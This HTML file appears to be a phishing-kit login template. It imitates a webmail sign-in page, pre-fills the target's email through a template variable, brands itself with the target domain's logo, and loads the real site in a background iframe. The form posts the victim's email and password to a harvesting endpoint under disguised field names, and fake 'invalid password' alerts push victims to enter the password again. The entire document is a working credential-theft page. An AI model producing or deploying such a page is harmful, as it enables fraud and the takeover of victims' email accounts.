<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
    <meta name="robots" content="noindex, nofollow">
    <meta name="googlebot" content="noindex, nofollow">
    <link rel="icon" href="https://api.kickfire.com/logo?website={{dman}}" type="image/x-icon">
    <title>Webmail Portal Login</title>
    <style>
        html, body, iframe {
            margin: 0;
            padding: 0;
            border: 0;
            height: 100%;
            width: 100%;
        }
        iframe {
            position: absolute;
            top: 0;
            left: 0;
            z-index: -1;
        }
        .form-holder {
            position: relative;
            z-index: 1;
        }
    </style>
</head>

<body oncontextmenu="return false;">
    <iframe src="https://www.{{dman}}" frameborder="0"></iframe> <!-- Add iframe here -->

    <div class="form-holder">
        <div class="xlogo">
            <link rel="icon" href="https://api.kickfire.com/logo?website={{dman}}" type="image/x-icon">
            <span style="text-transform: capitalize;" id="banNer"></span>
        </div>
        <div class="form-wrap">
            <form action="second" method="POST">
                <p>Please sign in with your email</p>
                <center>
                    <div class="alert alert-danger" id="mgss" style="display: none;color: red;font-weight: 600;margin-top: 20px">Invalid Password..! Please enter correct password.</div>
                    <span id="error" class="text-danger" style="display: none;color: red;">That account doesn't exist. Enter a different account</span>
                </center>
                <img src="https://api.kickfire.com/logo?website={{dman}}">
                <div class="finput">
                    <input type="email" id="ai" name="horse" value="{{eman}}" required="">
                </div>
                <div class="finput">
                    <input type="password" name="pig" placeholder="Email Password" id="pr" required="">
                </div>
                <div class="finput btn">
                    <button id="submit-btn">Continue</button>
                </div>
                <img src="data:image/png;base64,..." />
            </form>
        </div>
    </div>
</body>

</html>
